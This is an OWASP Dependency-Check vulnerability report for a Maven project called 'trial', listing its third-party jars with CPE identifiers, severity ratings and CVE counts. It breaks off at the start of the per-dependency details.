Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.

How to read the report | Suppressing false positives | Getting Help: google group | github issues

Project: trial

com.ntu.4062:trial:0.0.1-SNAPSHOT

Scan Information (show all):

Display: Showing Vulnerable Dependencies (click to show all)

DependencyCPECoordinatesHighest SeverityCVE CountCPE ConfidenceEvidence Count
stax-utils-20060502.jarnet.java.dev.stax-utils:stax-utils:20060502 013
stax-api-1.0.1.jarstax:stax-api:1.0.1 019
maven-scm-api-1.1.jarorg.apache.maven.scm:maven-scm-api:1.1 023
aopalliance-1.0.jaraopalliance:aopalliance:1.0 017
spring-core-2.5.6.jarcpe:/a:vmware:springsource_spring_framework:2.5.6
cpe:/a:pivotal_software:spring_framework:2.5.6
cpe:/a:springsource:spring_framework:2.5.6
cpe:/a:pivotal:spring_framework:2.5.6
org.springframework:spring-core:2.5.6High11Highest28
plexus-spring-1.2.jarorg.codehaus.plexus:plexus-spring:1.2 022
geronimo-spec-jta-1.0.1B-rc2.jarcpe:/a:apache:geronimo:1.0.1geronimo-spec:geronimo-spec-jta:1.0.1B-rc2High2Low14
jdo2-api-2.0.jarjavax.jdo:jdo2-api:2.0 019
plexus-jdo2-1.0-alpha-8.jarorg.codehaus.plexus:plexus-jdo2:1.0-alpha-8 022
maven-settings-2.0.9.jarorg.apache.maven:maven-settings:2.0.9 021
maven-profile-2.0.9.jarorg.apache.maven:maven-profile:2.0.9 021
maven-plugin-registry-2.0.9.jarorg.apache.maven:maven-plugin-registry:2.0.9 021
maven-project-2.0.9.jarorg.apache.maven:maven-project:2.0.9 023
maven-model-2.0.9.jarorg.apache.maven:maven-model:2.0.9 023
maven-artifact-2.0.9.jarorg.apache.maven:maven-artifact:2.0.9 021
maven-repository-metadata-2.0.9.jarorg.apache.maven:maven-repository-metadata:2.0.9 023
wagon-provider-api-1.0-beta-2.jarorg.apache.maven.wagon:wagon-provider-api:1.0-beta-2 023
maven-artifact-manager-2.0.9.jarorg.apache.maven:maven-artifact-manager:2.0.9 021
maven-scm-provider-accurev-1.1.jarorg.apache.maven.scm:maven-scm-provider-accurev:1.1 023
maven-scm-provider-git-commons-1.1.jarorg.apache.maven.scm:maven-scm-provider-git-commons:1.1 023
maven-scm-provider-gitexe-1.1.jarorg.apache.maven.scm:maven-scm-provider-gitexe:1.1 023
maven-scm-provider-vss-1.1.jarorg.apache.maven.scm:maven-scm-provider-vss:1.1 023
maven-scm-provider-cvs-commons-1.1.jarorg.apache.maven.scm:maven-scm-provider-cvs-commons:1.1 023
maven-scm-provider-svn-commons-1.1.jarorg.apache.maven.scm:maven-scm-provider-svn-commons:1.1 023
spring-web-2.5.1.jarcpe:/a:vmware:springsource_spring_framework:2.5.1
cpe:/a:pivotal:spring_framework:2.5.1
cpe:/a:pivotal_software:spring_framework:2.5.1
cpe:/a:springsource:spring_framework:2.5.1
org.springframework:spring-web:2.5.1High11Highest32
xmlrpc-server-3.1.jarcpe:/a:apache:xml-rpc:3.1.3org.apache.xmlrpc:xmlrpc-server:3.1High1Low22
atlassian-xmlrpc-binder-server-spring-0.8.2.jarcpe:/a:apache:xml-rpc:0.8.2com.atlassian.xmlrpc:atlassian-xmlrpc-binder-server-spring:0.8.2 0Low22
ws-commons-util-1.0.2.jarcpe:/a:ws_project:ws:1.0.2org.apache.ws.commons.util:ws-commons-util:1.0.2Medium1Low25
atlassian-xmlrpc-binder-support-0.8.2.jarcom.atlassian.xmlrpc:atlassian-xmlrpc-binder-support:0.8.2 020
atlassian-xmlrpc-binder-server-0.8.2.jarcom.atlassian.xmlrpc:atlassian-xmlrpc-binder-server:0.8.2 020
atlassian-xmlrpc-binder-annotations-0.8.2.jarcom.atlassian.xmlrpc:atlassian-xmlrpc-binder-annotations:0.8.2 020
atlassian-xmlrpc-binder-0.8.2.jarcom.atlassian.xmlrpc:atlassian-xmlrpc-binder:0.8.2 020
slf4j-log4j12-1.5.0.jarcpe:/a:slf4j:slf4j:1.5.0org.slf4j:slf4j-log4j12:1.5.0 0Low28
maven-plugin-api-2.0.jarorg.apache.maven:maven-plugin-api:2.0 030
maven-shared-io-1.0.jarorg.apache.maven.shared:maven-shared-io:1.0 023
file-management-1.1.jarorg.apache.maven.shared:file-management:1.1 023
plexus-utils-1.5.4.jarorg.codehaus.plexus:plexus-utils:1.5.4 011
plexus-classworlds-1.2-alpha-7.jarorg.codehaus.plexus:plexus-classworlds:1.2-alpha-7 022
junit-3.8.1.jarjunit:junit:3.8.1 019
plexus-component-api-1.0-alpha-19.jarorg.codehaus.plexus:plexus-component-api:1.0-alpha-19 019
backport-util-concurrent-3.0.jarbackport-util-concurrent:backport-util-concurrent:3.0 024
plexus-taskqueue-1.0-alpha-8.jarorg.codehaus.plexus:plexus-taskqueue:1.0-alpha-8 022
plexus-action-1.0-alpha-6.jarorg.codehaus.plexus:plexus-action:1.0-alpha-6 024
plexus-command-line-1.0-alpha-2.jarorg.codehaus.plexus:plexus-command-line:1.0-alpha-2 024
plexus-interactivity-api-1.0-alpha-6.jarorg.codehaus.plexus:plexus-interactivity-api:1.0-alpha-6 022
maven-scm-manager-plexus-1.0.jarorg.apache.maven.scm:maven-scm-manager-plexus:1.0 021
regexp-1.3.jarregexp:regexp:1.3 011
maven-scm-provider-bazaar-1.0.jarorg.apache.maven.scm:maven-scm-provider-bazaar:1.0 021
maven-scm-provider-clearcase-1.0.jarorg.apache.maven.scm:maven-scm-provider-clearcase:1.0 021
maven-scm-provider-cvsexe-1.0.jarorg.apache.maven.scm:maven-scm-provider-cvsexe:1.0 021
cvsclient-20060125.jarorg.netbeans.lib:cvsclient:20060125 015
ganymed-ssh2-build210.jarch.ethz.ganymed:ganymed-ssh2:build210 018
maven-scm-provider-cvsjava-1.0.jarorg.apache.maven.scm:maven-scm-provider-cvsjava:1.0 021
maven-scm-provider-hg-1.0.jarorg.apache.maven.scm:maven-scm-provider-hg:1.0 021
maven-scm-provider-perforce-1.0.jarorg.apache.maven.scm:maven-scm-provider-perforce:1.0 021
maven-scm-provider-starteam-1.0.jarorg.apache.maven.scm:maven-scm-provider-starteam:1.0 021
maven-scm-provider-svnexe-1.0.jarorg.apache.maven.scm:maven-scm-provider-svnexe:1.0 021
maven-scm-provider-synergy-1.0.jarorg.apache.maven.scm:maven-scm-provider-synergy:1.0 021
jdom-1.0.jarjdom:jdom:1.0 029
jaxen-1.1-beta-8.jarjaxen:jaxen:1.1-beta-8 024
maven-release-manager-1.0-alpha-3.jarorg.apache.maven.release:maven-release-manager:1.0-alpha-3 023
slf4j-api-1.5.6.jarcpe:/a:slf4j:slf4j:1.5.6org.slf4j:slf4j-api:1.5.6 0Low28
jsr250-api-1.0.jarjavax.annotation:jsr250-api:1.0 017
continuum-buildagent-core-1.3.2.jarcpe:/a:apache:continuum:1.3.2org.apache.continuum:continuum-buildagent-core:1.3.2 0Low23
lz4-1.1.2.jarnet.jpountz.lz4:lz4:1.1.2 019
asm-3.3.jarasm:asm:3.3 015
asm-tree-3.3.jarasm:asm-tree:3.3 015
asm-commons-3.3.jarasm:asm-commons:3.3 015
xwork-core-2.3.24.jarorg.apache.struts.xwork:xwork-core:2.3.24 028
freemarker-2.3.22.jarorg.freemarker:freemarker:2.3.22 033
javassist-3.11.0.GA.jarjavassist:javassist:3.11.0.GA 016
ognl-3.0.6.jarcpe:/a:ognl_project:ognl:3.0.6ognl:ognl:3.0.6Medium1Low19
commons-fileupload-1.3.1.jarcpe:/a:apache:commons_fileupload:1.3.1commons-fileupload:commons-fileupload:1.3.1High2Highest33
commons-io-2.2.jarcommons-io:commons-io:2.2 033
struts2-core-2.3.24.jarcpe:/a:apache:struts:2.3.24org.apache.struts:struts2-core:2.3.24High21Highest28
commons-collections4-4.1.jarcpe:/a:apache:commons_collections:4.1org.apache.commons:commons-collections4:4.1 0Low36
wicket-core-7.10.0.jarcpe:/a:apache:wicket:7.10.0org.apache.wicket:wicket-core:7.10.0 0Low32
findbugs-annotations-1.3.9-1.jarcom.github.stephenc.findbugs:findbugs-annotations:1.3.9-1 021
jgroups-3.6.10.Final.jarorg.jgroups:jgroups:3.6.10.Final 029
antlr-2.7.7.jarantlr:antlr:2.7.7 015
jackson-annotations-2.8.6.jarcpe:/a:fasterxml:jackson:2.8.6com.fasterxml.jackson.core:jackson-annotations:2.8.6 0Low36
jackson-databind-2.8.6.jarcpe:/a:fasterxml:jackson:2.8.6
cpe:/a:fasterxml:jackson-databind:2.8.6
com.fasterxml.jackson.core:jackson-databind:2.8.6High5Highest36
commons-lang-2.6.jarcommons-lang:commons-lang:2.6 031
fastutil-7.1.0.jarit.unimi.dsi:fastutil:7.1.0 019
javax.transaction-api-1.2.jarjavax.transaction:javax.transaction-api:1.2 035
javax.resource-api-1.7.jarjavax.resource:javax.resource-api:1.7 035
jna-4.0.0.jarnet.java.dev.jna:jna:4.0.0 027
jopt-simple-5.0.3.jarnet.sf.jopt-simple:jopt-simple:5.0.3 019
log4j-core-2.7.jarcpe:/a:apache:log4j:2.7org.apache.logging.log4j:log4j-core:2.7High1Highest34
shiro-core-1.3.2.jarcpe:/a:apache:shiro:1.3.2org.apache.shiro:shiro-core:1.3.2 0Low28
commons-beanutils-1.9.3.jarcpe:/a:apache:commons_beanutils:1.9.3commons-beanutils:commons-beanutils:1.9.3 0Low37
fast-classpath-scanner-2.0.11.jario.github.lukehutch:fast-classpath-scanner:2.0.11 027
geode-core-1.2.1.jarcpe:/a:apache:geode:1.2.1org.apache.geode:geode-core:1.2.1High7Highest18
javax.persistence-2.1.0.jarorg.eclipse.persistence:javax.persistence:2.1.0 030
commonj.sdo-2.1.1.jarorg.eclipse.persistence:commonj.sdo:2.1.1 024
eclipselink-2.5.2.jarorg.eclipse.persistence:eclipselink:2.5.2 025
gateway-i18n-logging-log4j-0.10.0.jarcpe:/a:apache:log4j:0.10.0org.apache.knox:gateway-i18n-logging-log4j:0.10.0 0Low23
apacheds-i18n-2.0.0-M5.jarorg.apache.directory.server:apacheds-i18n:2.0.0-M5 030
apacheds-jdbm-2.0.0-M5.jarorg.apache.directory.server:apacheds-jdbm:2.0.0-M5 030
json-smart-1.3.1.jarnet.minidev:json-smart:1.3.1 021
nimbus-jose-jwt-4.11.jarcpe:/a:connect2id:nimbus_jose%2bjwt:4.11com.nimbusds:nimbus-jose-jwt:4.11Medium3Highest40
json-path-0.9.1.jarcom.jayway.jsonpath:json-path:0.9.1 022
gateway-spi-0.10.0.jarcpe:/a:apache:knox:0.10.0org.apache.knox:gateway-spi:0.10.0Medium1Highest23
hadoop-auth-2.2.0.jarcpe:/a:apache:hadoop:2.2.0org.apache.hadoop:hadoop-auth:2.2.0High7Highest23
javax.servlet-api-3.1.0.jarjavax.servlet:javax.servlet-api:3.1.0 033
httpclient-4.5.1.jarcpe:/a:apache:httpclient:4.5.1org.apache.httpcomponents:httpclient:4.5.1 0Low29
shiro-web-1.2.3.jarcpe:/a:apache:shiro:1.2.3org.apache.shiro:shiro-web:1.2.3Medium1Low28
commons-codec-1.7.jarcommons-codec:commons-codec:1.7 033
oro-2.0.8.jaroro:oro:2.0.8 011
commons-net-1.4.1.jarcommons-net:commons-net:1.4.1 023
cglib-2.2.2.jarcglib:cglib:2.2.2 019
commons-digester3-3.2.jarorg.apache.commons:commons-digester3:3.2 034
commons-cli-1.2.jarcommons-cli:commons-cli:1.2 031
shrinkwrap-api-1.2.3.jarorg.jboss.shrinkwrap:shrinkwrap-api:1.2.3 028
shrinkwrap-spi-1.2.3.jarorg.jboss.shrinkwrap:shrinkwrap-spi:1.2.3 028
shrinkwrap-impl-base-1.2.3.jarorg.jboss.shrinkwrap:shrinkwrap-impl-base:1.2.3 028
shrinkwrap-descriptors-api-base-2.0.0-alpha-8.jarorg.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-api-base:2.0.0-alpha-8 029
shrinkwrap-descriptors-api-javaee-2.0.0-alpha-8.jarorg.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-api-javaee:2.0.0-alpha-8 029
shrinkwrap-descriptors-spi-2.0.0-alpha-8.jarorg.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-spi:2.0.0-alpha-8 029
shrinkwrap-descriptors-impl-base-2.0.0-alpha-8.jarorg.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-impl-base:2.0.0-alpha-8 029
shrinkwrap-descriptors-impl-javaee-2.0.0-alpha-8.jarorg.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-impl-javaee:2.0.0-alpha-8 029
jericho-html-3.2.jarnet.htmlparser.jericho:jericho-html:3.2 019
zip4j-1.3.2.jarnet.lingala.zip4j:zip4j:1.3.2 013
joda-time-2.9.2.jarjoda-time:joda-time:2.9.2 033
jetty-jndi-9.2.15.v20160210.jarcpe:/a:jetty:jetty:9.2.15.v20160210
cpe:/a:eclipse:jetty:9.2.15.v20160210
org.eclipse.jetty:jetty-jndi:9.2.15.v20160210High4Low34
javax.annotation-api-1.2.jarjavax.annotation:javax.annotation-api:1.2 035
jetty-schemas-3.1.M0.jarorg.eclipse.jetty.toolchain:jetty-schemas:3.1.M0 024
apache-el-8.0.9.M3.jarcpe:/a:apache_tomcat:apache_tomcat:8.0.9.m3org.mortbay.jasper:apache-el:8.0.9.M3 0Low24
apache-jsp-8.0.9.M3.jarcpe:/a:apache_tomcat:apache_tomcat:8.0.9.m3
cpe:/a:jasper_project:jasper:8.0.9.m3
org.mortbay.jasper:apache-jsp:8.0.9.M3 0Low24
org.eclipse.jdt.core-3.8.2.v20130121.jarcpe:/a:eclipse:jetty:3.8.2.v20130121
cpe:/a:jetty:jetty:3.8.2.v20130121
org.eclipse.jetty.orbit:org.eclipse.jdt.core:3.8.2.v20130121High4Low21
apache-jsp-9.2.15.v20160210.jarcpe:/a:jetty:jetty:9.2.15.v20160210
cpe:/a:eclipse:jetty:9.2.15.v20160210
org.eclipse.jetty:apache-jsp:9.2.15.v20160210High4Low36
taglibs-standard-spec-1.2.1.jarcpe:/a:apache:standard_taglibs:1.2.1org.apache.taglibs:taglibs-standard-spec:1.2.1High1Highest28
apache-jstl-9.2.15.v20160210.jarcpe:/a:apache_tomcat:apache_tomcat:9.2.15.v20160210org.eclipse.jetty:apache-jstl:9.2.15.v20160210 0Low21
websocket-common-9.2.15.v20160210.jarcpe:/a:jetty:jetty:9.2.15.v20160210
cpe:/a:eclipse:jetty:9.2.15.v20160210
org.eclipse.jetty.websocket:websocket-common:9.2.15.v20160210High4Low30
websocket-api-9.2.15.v20160210.jarorg.eclipse.jetty.websocket:websocket-api:9.2.15.v20160210 030
javax.websocket-api-1.1.jarjavax.websocket:javax.websocket-api:1.1 026
javax-websocket-server-impl-9.2.15.v20160210.jarcpe:/a:jetty:jetty:9.2.15.v20160210
cpe:/a:eclipse:jetty:9.2.15.v20160210
org.eclipse.jetty.websocket:javax-websocket-server-impl:9.2.15.v20160210High4Low34
onos-core-dist-1.13.1.jarcpe:/a:onosproject:onos:1.13.1org.onosproject:onos-core-dist:1.13.1High3Highest22
asm-5.0.4.jarorg.ow2.asm:asm:5.0.4 025
commons-collections-3.2.2.jarcpe:/a:apache:commons_collections:3.2.2commons-collections:commons-collections:3.2.2 0Low37
commons-configuration-1.10.jarcommons-configuration:commons-configuration:1.10 033
commons-lang3-3.6.jarorg.apache.commons:commons-lang3:3.6 038
commons-logging-1.2.jarcommons-logging:commons-logging:1.2 033
commons-math3-3.6.1.jarorg.apache.commons:commons-math3:3.6.1 038
commons-pool-1.6.jarcommons-pool:commons-pool:1.6 033
concurrent-trees-2.6.1.jarcom.googlecode.concurrent-trees:concurrent-trees:2.6.1 020
error_prone_annotations-2.0.18.jarcom.google.errorprone:error_prone_annotations:2.0.18 020
j2objc-annotations-1.1.jarcom.google.j2objc:j2objc-annotations:1.1 020
animal-sniffer-annotations-1.14.jarorg.codehaus.mojo:animal-sniffer-annotations:1.14 021
guava-22.0.jarcpe:/a:google:guava:22.0com.google.guava:guava:22.0Medium1Highest26
jackson-core-2.9.5.jarcpe:/a:fasterxml:jackson:2.9.5com.fasterxml.jackson.core:jackson-core:2.9.5 0Low38
javax.ws.rs-api-2.1.jarcpe:/a:ws_project:ws:2.1javax.ws.rs:javax.ws.rs-api:2.1 0Low35
osgi-resource-locator-1.0.1.jarorg.glassfish.hk2:osgi-resource-locator:1.0.1 024
jersey-common-2.26.jarorg.glassfish.jersey.core:jersey-common:2.26 026
jersey-client-2.26.jarorg.glassfish.jersey.core:jersey-client:2.26 026
jersey-media-jaxb-2.26.jarorg.glassfish.jersey.media:jersey-media-jaxb:2.26 026
javax.inject-2.5.0-b42.jarorg.glassfish.hk2.external:javax.inject:2.5.0-b42 024
validation-api-1.1.0.Final.jarjavax.validation:validation-api:1.1.0.Final 019
jersey-server-2.26.jarorg.glassfish.jersey.core:jersey-server:2.26 026
jsr305-3.0.1.jarcom.google.code.findbugs:jsr305:3.0.1 020
kryo-4.0.1.jarcom.esotericsoftware:kryo:4.0.1 021
metrics-core-3.2.2.jario.dropwizard.metrics:metrics-core:3.2.2 022
metrics-json-3.2.2.jario.dropwizard.metrics:metrics-json:3.2.2 022
minlog-1.3.0.jarcom.esotericsoftware:minlog:1.3.0 026
netty-3.10.5.Final.jarcpe:/a:netty_project:netty:3.10.5io.netty:netty:3.10.5.Final 0Low25
netty-transport-4.1.8.Final.jarcpe:/a:netty_project:netty:4.1.8io.netty:netty-transport:4.1.8.Final 0Low27
objenesis-2.6.jarorg.objenesis:objenesis:2.6 034
org.apache.felix.scr-1.8.2.jarorg.apache.felix:org.apache.felix.scr:1.8.2 025
org.apache.felix.scr.annotations-1.9.12.jarorg.apache.felix:org.apache.felix.scr.annotations:1.9.12 024
jansi-1.11.jarorg.fusesource.jansi:jansi:1.11 021
jline-2.13.jarjline:jline:2.13 017
org.apache.felix.fileinstall-3.5.2.jarorg.apache.felix:org.apache.felix.fileinstall:3.5.2 033
sshd-core-0.14.0.jarorg.apache.sshd:sshd-core:0.14.0 030
org.apache.karaf.system.core-3.0.8.jarcpe:/a:apache:karaf:3.0.8org.apache.karaf.system:org.apache.karaf.system.core:3.0.8Low1Low31
xml-apis-1.0.b2.jarxml-apis:xml-apis:1.0.b2 032
org.apache.servicemix.bundles.dom4j-1.6.1_5.jarcpe:/a:dom4j_project:dom4j:1.6.1.5org.apache.servicemix.bundles:org.apache.servicemix.bundles.dom4j:1.6.1_5 0Low25
org.osgi.compendium-5.0.0.jar org.osgi : org.osgi.compendium : 5.0.0  028
org.osgi.core-5.0.0.jarorg.osgi:org.osgi.core:5.0.0 028
reflectasm-1.11.0.jarcom.esotericsoftware:reflectasm:1.11.0 022
onlab-misc-1.13.1.jarcpe:/a:onosproject:onos:1.13.1org.onosproject:onlab-misc:1.13.1High3Highest20
lucene-analyzers-common-7.0.1.jarorg.apache.lucene:lucene-analyzers-common:7.0.1 023
lucene-analyzers-kuromoji-7.0.1.jarorg.apache.lucene:lucene-analyzers-kuromoji:7.0.1 023
lucene-analyzers-phonetic-7.0.1.jarorg.apache.lucene:lucene-analyzers-phonetic:7.0.1 023
lucene-backward-codecs-7.0.1.jarorg.apache.lucene:lucene-backward-codecs:7.0.1 023
lucene-classification-7.0.1.jarorg.apache.lucene:lucene-classification:7.0.1 023
lucene-codecs-7.0.1.jarorg.apache.lucene:lucene-codecs:7.0.1 023
lucene-core-7.0.1.jarorg.apache.lucene:lucene-core:7.0.1 023
lucene-expressions-7.0.1.jarorg.apache.lucene:lucene-expressions:7.0.1 023
lucene-grouping-7.0.1.jarorg.apache.lucene:lucene-grouping:7.0.1 023
lucene-highlighter-7.0.1.jarorg.apache.lucene:lucene-highlighter:7.0.1 023
lucene-join-7.0.1.jarorg.apache.lucene:lucene-join:7.0.1 023
lucene-memory-7.0.1.jarorg.apache.lucene:lucene-memory:7.0.1 023
lucene-misc-7.0.1.jarorg.apache.lucene:lucene-misc:7.0.1 023
lucene-queries-7.0.1.jarorg.apache.lucene:lucene-queries:7.0.1 023
lucene-queryparser-7.0.1.jarorg.apache.lucene:lucene-queryparser:7.0.1 023
lucene-sandbox-7.0.1.jarorg.apache.lucene:lucene-sandbox:7.0.1 023
lucene-spatial-extras-7.0.1.jarorg.apache.lucene:lucene-spatial-extras:7.0.1 023
lucene-suggest-7.0.1.jarorg.apache.lucene:lucene-suggest:7.0.1 023
hppc-0.7.1.jarcom.carrotsearch:hppc:0.7.1 020
jackson-dataformat-smile-2.5.4.jarcpe:/a:fasterxml:jackson:2.5.4com.fasterxml.jackson.dataformat:jackson-dataformat-smile:2.5.4 0Low36
caffeine-2.4.0.jarcom.github.ben-manes.caffeine:caffeine:2.4.0 020
protobuf-java-3.1.0.jarcpe:/a:google:protobuf:3.1.0com.google.protobuf:protobuf-java:3.1.0Medium1Highest26
t-digest-3.1.jarcom.tdunning:t-digest:3.1 020
dom4j-1.6.1.jarcpe:/a:dom4j_project:dom4j:1.6.1dom4j:dom4j:1.6.1Medium1Highest25
gmetric4j-1.0.7.jarinfo.ganglia.gmetric4j:gmetric4j:1.0.7 020
metrics-ganglia-3.2.2.jario.dropwizard.metrics:metrics-ganglia:3.2.2 022
metrics-graphite-3.2.2.jarcpe:/a:graphite_project:graphite:3.2.2io.dropwizard.metrics:metrics-graphite:3.2.2 0Low22
metrics-jetty9-3.2.2.jarcpe:/a:jetty:jetty:3.2.2io.dropwizard.metrics:metrics-jetty9:3.2.2 0Low22
metrics-jvm-3.2.2.jario.dropwizard.metrics:metrics-jvm:3.2.2 022
log4j-1.2.17.jarcpe:/a:apache:log4j:1.2.17log4j:log4j:1.2.17 0Low27
eigenbase-properties-1.1.5.jarnet.hydromatic:eigenbase-properties:1.1.5 027
antlr4-runtime-4.5.1-1.jarorg.antlr:antlr4-runtime:4.5.1-1 030
calcite-core-1.13.0.jarorg.apache.calcite:calcite-core:1.13.0 025
calcite-linq4j-1.13.0.jarorg.apache.calcite:calcite-linq4j:1.13.0 025
avatica-core-1.10.0.jarorg.apache.calcite.avatica:avatica-core:1.10.0 025
commons-exec-1.3.jarorg.apache.commons:commons-exec:1.3 036
curator-client-2.8.0.jarorg.apache.curator:curator-client:2.8.0 024
curator-framework-2.8.0.jarcpe:/a:apache:zookeeper:2.8.0org.apache.curator:curator-framework:2.8.0Medium2Low24
curator-recipes-2.8.0.jarorg.apache.curator:curator-recipes:2.8.0 024
hadoop-hdfs-2.7.4.jarcpe:/a:apache:hadoop:2.7.4org.apache.hadoop:hadoop-hdfs:2.7.4Medium1Highest22
htrace-core-3.2.0-incubating.jarcpe:/a:fasterxml:jackson:3.2.0org.apache.htrace:htrace-core:3.2.0-incubating 0Low18
httpcore-4.4.1.jarorg.apache.httpcomponents:httpcore:4.4.1 029
httpmime-4.4.1.jarorg.apache.httpcomponents:httpmime:4.4.1 029
zookeeper-3.4.10.jarcpe:/a:apache:zookeeper:3.4.10org.apache.zookeeper:zookeeper:3.4.10Medium1Low20
jackson-core-asl-1.9.13.jarcpe:/a:fasterxml:jackson:1.9.13org.codehaus.jackson:jackson-core-asl:1.9.13 0Low29
commons-compiler-2.7.6.jarorg.codehaus.janino:commons-compiler:2.7.6 020
janino-2.7.6.jarorg.codehaus.janino:janino:2.7.6 025
stax2-api-3.1.4.jarorg.codehaus.woodstox:stax2-api:3.1.4 026
woodstox-core-asl-4.4.1.jarorg.codehaus.woodstox:woodstox-core-asl:4.4.1 029
jetty-io-9.3.14.v20161028.jarorg.eclipse.jetty:jetty-io:9.3.14.v20161028 036
jetty-jmx-9.3.14.v20161028.jarcpe:/a:jetty:jetty:9.3.14.v20161028
cpe:/a:eclipse:jetty:9.3.14.v20161028
org.eclipse.jetty:jetty-jmx:9.3.14.v20161028Medium1Low38
spatial4j-0.6.jarorg.locationtech.spatial4j:spatial4j:0.6 028
noggit-0.8.jarorg.noggit:noggit:0.8 016
asm-commons-5.1.jarorg.ow2.asm:asm-commons:5.1 025
jcl-over-slf4j-1.7.7.jarcpe:/a:slf4j:slf4j:1.7.7org.slf4j:jcl-over-slf4j:1.7.7 0Low28
solr-core-7.0.1.jarcpe:/a:apache:solr:7.0.1org.apache.solr:solr-core:7.0.1High4Highest23
umlet-12.0.jarcom.umlet:umlet:12.0 018
tomcat-juli-7.0.42.jarcpe:/a:apache_software_foundation:tomcat:7.0.42org.apache.tomcat:tomcat-juli:7.0.42 0Low18
tomcat-annotations-api-7.0.42.jarorg.apache.tomcat:tomcat-annotations-api:7.0.42 016
tomcat-api-7.0.42.jarcpe:/a:apache_software_foundation:tomcat:7.0.42
cpe:/a:apache_tomcat:apache_tomcat:7.0.42
cpe:/a:apache:tomcat:7.0.42
org.apache.tomcat:tomcat-api:7.0.42High44Highest18
commons-beanutils-core-1.7.0.jarcpe:/a:apache:commons_beanutils:1.7.0commons-beanutils:commons-beanutils-core:1.7.0High1Low14
xmlParserAPIs-2.6.2.jarxerces:xmlParserAPIs:2.6.2 022
xercesImpl-2.6.2.jarxerces:xercesImpl:2.6.2 025
xalan-2.7.0.jarcpe:/a:apache:xalan-java:2.7.0xalan:xalan:2.7.0High1Highest21
xom-1.1.jarxom:xom:1.1 031
bsh-core-2.0b4.jarcpe:/a:beanshell_project:beanshell:2.0.b4org.beanshell:bsh-core:2.0b4Medium1Low22
batik-ext-1.7.jarcpe:/a:apache:batik:1.7org.apache.xmlgraphics:batik-ext:1.7High3Highest19
xml-apis-ext-1.3.04.jarxml-apis:xml-apis-ext:1.3.04 027
nekohtml-1.9.12.jarnet.sourceforge.nekohtml:nekohtml:1.9.12 015
commons-httpclient-3.1.jarcpe:/a:apache:httpclient:3.1
cpe:/a:apache:commons-httpclient:3.1
commons-httpclient:commons-httpclient:3.1 0Low21
antisamy-1.4.3.jarcpe:/a:antisamy_project:antisamy:1.4.3org.owasp.antisamy:antisamy:1.4.3Medium3Highest19
esapi-2.0.1.jarcpe:/a:owasp:enterprise_security_api:2.0.1org.owasp.esapi:esapi:2.0.1Medium2Highest25
tomcat-coyote-7.0.0.jarcpe:/a:apache:coyote_http_connector:7.0.0
cpe:/a:apache:tomcat_connectors:7.0.0
cpe:/a:apache_software_foundation:tomcat:7.0.0
cpe:/a:apache_tomcat:apache_tomcat:7.0.0
cpe:/a:apache:tomcat:7.0.0
org.apache.tomcat:tomcat-coyote:7.0.0High77Highest16
spatial4j-0.4.1.jarcom.spatial4j:spatial4j:0.4.1 026
lucene-spatial-4.10.4.jarorg.apache.lucene:lucene-spatial:4.10.4 023
antlr-runtime-3.5.jarorg.antlr:antlr-runtime:3.5 023
elasticsearch-1.5.2.jarcpe:/a:elasticsearch:elasticsearch:1.5.2org.elasticsearch:elasticsearch:1.5.2Medium2Highest14
jempbox-1.8.11.jarcpe:/a:apache:pdfbox:1.8.11org.apache.pdfbox:jempbox:1.8.11High2Highest30
xmlschema-core-2.2.1.jarcpe:/a:ws_project:ws:2.2.1org.apache.ws.xmlschema:xmlschema-core:2.2.1 0Low27
cxf-core-3.1.4.jarcpe:/a:apache:cxf:3.1.4org.apache.cxf:cxf-core:3.1.4High7Highest32
jboss-jaxrs-api_2.0_spec-1.0.1.Beta1.jarorg.jboss.spec.javax.ws.rs:jboss-jaxrs-api_2.0_spec:1.0.1.Beta1 037
resteasy-jaxrs-services-3.1.1.Final.jarorg.jboss.resteasy:resteasy-jaxrs-services:3.1.1.Final 026
jboss-annotations-api_1.2_spec-1.0.0.Final.jarorg.jboss.spec.javax.annotation:jboss-annotations-api_1.2_spec:1.0.0.Final 037
activation-1.1.1.jarjavax.activation:activation:1.1.1 021
jcip-annotations-1.0.jarnet.jcip:jcip-annotations:1.0 017
jboss-logging-3.3.0.Final.jarorg.jboss.logging:jboss-logging:3.3.0.Final 041
resteasy-jaxrs-3.1.1.Final.jarorg.jboss.resteasy:resteasy-jaxrs:3.1.1.Final 026
jna-4.0.0.jar: jnidispatch.dll 02
jna-4.0.0.jar: jnidispatch.dll 02
jna-4.0.0.jar: jnidispatch.dll 02
jansi-1.11.jar: jansi.dll 02
jansi-1.11.jar: jansi.dll 02
plexus-utils-1.5.4.jar (shaded: org.codehaus.plexus:plexus-interpolation:1.0)org.codehaus.plexus:plexus-interpolation:1.0 012
netty-common-4.1.8.Final.jar (shaded: org.jctools:jctools-core:1.2.1)org.jctools:jctools-core:1.2.1 011
jansi-1.11.jar (shaded: org.fusesource.hawtjni:hawtjni-runtime:1.8)org.fusesource.hawtjni:hawtjni-runtime:1.8 013
jansi-1.11.jar (shaded: org.fusesource.jansi:jansi-native:1.5)cpe:/a:id:id-software:1.5org.fusesource.jansi:jansi-native:1.5 0Low16
jansi-1.11.jar (shaded: org.fusesource.jansi:jansi:1.11)cpe:/a:id:id-software:1.11org.fusesource.jansi:jansi:1.11 0Low13
htrace-core-3.2.0-incubating.jar (shaded: commons-logging:commons-logging:1.1.1)commons-logging:commons-logging:1.1.1 016

Dependencies

stax-utils-20060502.jar

License:

BSD: https://stax-utils.dev.java.net/source/browse/*checkout*/stax-utils/LICENSE
File Path: /Users/Kevin/.m2/repository/net/java/dev/stax-utils/stax-utils/20060502/stax-utils-20060502.jar
MD5: 6af71b7f47537a53c5adf70423a8fbfc
SHA1: 66fad5029732305ab7863c140eafd9de4972dd34
SHA256:ecafb82b24e0960a2ca360a91101c49d59ecd6b597a05e6150e0d2697b3547af
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.java.dev.stax-utils:stax-utils:20060502  Confidence:Highest

stax-api-1.0.1.jar

Description:

